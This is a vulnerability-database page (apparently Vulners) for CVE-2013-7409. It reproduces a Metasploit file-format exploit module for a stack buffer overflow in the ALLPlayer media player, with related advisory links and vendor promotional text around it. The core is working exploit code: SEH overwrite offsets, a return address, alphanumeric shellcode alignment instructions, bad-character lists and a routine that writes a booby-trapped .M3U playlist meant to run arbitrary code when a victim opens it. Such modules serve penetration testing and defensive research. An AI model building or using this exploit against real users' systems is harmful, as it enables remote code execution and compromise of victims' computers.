Lucene search
K

ALLPlayer M3U Buffer Overflow

🗓️ 03 Mar 2014 23:51:01Reported by metacom, Mike Czumak, Gabor SeljanType 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

ALLPlayer M3U Buffer Overflow vulnerability in version 5.8.1 allows remote code execution or application crash via crafted .M3U file on Windows 7SP

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-7409
3 Mar 201400:00
circl
Check Point Advisories
ALLPlayer M3U File Stack Buffer Overflow (CVE-2013-7409)
3 May 201700:00
checkpoint_advisories
CVE
CVE-2013-7409
30 Oct 201415:00
cve
Cvelist
CVE-2013-7409
30 Oct 201415:00
cvelist
NVD
CVE-2013-7409
30 Oct 201415:55
nvd
OpenVAS
ALLPlayer Buffer Overflow Vulnerability (Nov 2014) - Windows
21 Nov 201400:00
openvas
Prion
Buffer overflow
30 Oct 201415:55
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLPlayer M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        ALLPlayer 5.8.1, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .M3U file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery
          'Mike Czumak',  # Original exploit
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-7409' ],
          [ 'BID', '62926' ],
          [ 'BID', '63896' ],
          [ 'EDB', '28855' ],
          [ 'EDB', '29549' ],
          [ 'EDB', '29798' ],
          [ 'EDB', '32041' ],
          [ 'OSVDB', '98283' ],
          [ 'URL', 'http://www.allplayer.org/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
          'Space'          => 3060,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Targets'        =>
        [
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
            {
              'Offset' => 301,
              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-10-09',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
        ],
      self.class)

  end


  def exploit
    nop = target['Nop']

    sploit =  rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50"      # POPAD
    sploit << target.ret
    sploit << "\x53"          # PUSH EBX
    sploit << nop
    sploit << "\x58"          # POP EAX
    sploit << nop
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50"          # PUSH EAX
    sploit << nop
    sploit << "\xc3"          # RET
    sploit << nop * 109
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation